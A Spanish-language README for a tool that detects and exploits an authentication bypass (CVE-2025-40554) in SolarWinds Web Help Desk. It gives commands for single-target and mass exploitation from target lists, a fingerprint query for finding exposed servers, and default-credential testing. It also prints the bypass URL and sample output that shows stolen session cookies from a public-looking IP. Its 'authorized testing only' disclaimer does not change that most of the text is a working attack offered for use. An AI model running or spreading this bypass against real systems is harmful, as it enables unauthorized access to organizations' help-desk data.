
Explotación de CVE-2025-40554
Una herramienta integral de pruebas de seguridad para detectar y explotar la vulnerabilidad de omisión de autenticación (CVE-2025-40554 / CVE-2025-40536) en SolarWinds Web Help Desk.
SOLO CON FINES EDUCATIVOS Y DE PRUEBAS DE SEGURIDAD AUTORIZADAS
Esta herramienta se proporciona para investigación de seguridad, pruebas de penetración y evaluación de vulnerabilidades en sistemas que posea o para los cuales tenga permiso explícito por escrito. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no se responsabilizan por el mal uso o daños causados por esta herramienta.
CVE-2025-40554 es una vulnerabilidad crítica de omisión de autenticación en SolarWinds Web Help Desk que permite a atacantes no autenticados:
Compruébelo usted mismo :))
Dependencias:
# Clone o descargue el script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# Hacerlo ejecutable
chmod +x CVE-2025-40554.py
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
# Verificación simple de vulnerabilidad
python3 CVE-2025-40554.py -t https://target:8443
# Con protocolo explícito
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
# Explotación completa con enumeración de sesiones
python3 CVE-2025-40554.py -t https://target:8443 --exploit
# Omitir prueba de credenciales por defecto
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login
# Escanear múltiples objetivos desde un archivo
python3 CVE-2025-40554.py -l targets.txt
# Escaneo masivo con explotación
python3 CVE-2025-40554.py -l targets.txt --exploit
# Modo silencioso (salida mínima)
python3 CVE-2025-40554.py -l targets.txt -q
# Archivo de salida personalizado
python3 CVE-2025-40554.py -l targets.txt -o results.txt
targets.txt:
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Los comentarios están soportados
| Opción | Descripción |
|---|---|
-t, --target URL | URL del objetivo único a probar |
-l, --list FILE | Archivo que contiene una lista de objetivos (uno por línea) |
--exploit | Habilita el modo de explotación completa con enumeración |
--no-login | Omite la prueba de credenciales por defecto |
-o, --output FILE | Archivo de salida para objetivos vulnerables (por defecto: vulnerable_targets.txt) |
-q, --quiet | Modo de salida mínima (útil para escaneos masivos) |
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2025-40554 - SolarWinds Web Help Desk ║
║ Herramienta de Explotación por Omisión de Autenticación ║
║ Solo con fines de Investigación y Educativos ║
╚═══════════════════════════════════════════════════════════════════╝
======================================================================
Objetivo: https://203.106.221.203:8443
======================================================================
[*] Paso 1: Estableciendo sesión...
[+] WOSID extraído: AbCdEfGhIjKlMnOpQrStU
[+] Token XSRF: abc123-def456-ghi789
[*] Paso 2: Probando omisión de autenticación...
[+] Indicadores de omisión encontrados: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - ¡Omisión de autenticación confirmada!
[*] Paso 3: Probando credenciales por defecto (client/client)...
[+] ÉXITO - ¡Las credenciales por defecto funcionan!
======================================================================
MODO DE EXPLOTACIÓN - Omisión de Autenticación CVE-2025-40554
======================================================================
[*] URL de omisión: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Activando omisión de autenticación...
[+] ¡Omisión de autenticación exitosa!
[*] Cookies de Sesión:
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
RESUMEN
======================================================================
[+] El objetivo es VULNERABLE a CVE-2025-40554
[+] Credenciales por defecto: FUNCIONAN
======================================================================
[*] Cargados 5 objetivos únicos desde targets.txt
[*] Modo: Omisión + prueba de credenciales por defecto
[*] Explotación completa habilitada
[1/5] Probando https://target1:8443
[+] VULNERABLE - ¡Omisión de autenticación confirmada!
[+] ÉXITO - ¡Las credenciales por defecto funcionan!
[2/5] Probando https://target2:8443
[!] NO VULNERABLE - Omisión de autenticación fallida
...
======================================================================
RESUMEN DEL ESCANEO
======================================================================
Total escaneados: 5/5
Vulnerables: 2
Con cred. por defecto: 1
======================================================================
[+] Resultados guardados en: vulnerable_targets.txt
Establecimiento de Sesión
Omisión de Autenticación
Prueba de Credenciales (opcional)
Explotación Completa (modo --exploit)
La herramienta detecta una omisión exitosa verificando:
externalAuthContainer - Configuración de autenticación externaJSONRpcClient - Exposición de cliente APISAML 2.0 - Configuración de SSOLoginPref - Ajustes de preferencias de inicio de sesiónauthMode - Ajustes del modo de autenticaciónLas contribuciones son bienvenidas.....
Esta herramienta se proporciona "tal cual" sin garantía de ningún tipo. Úsela bajo su propio riesgo.
Skynoxk
Recuerde: Siempre piratee ética y legalmente. El acceso no autorizado es un delito.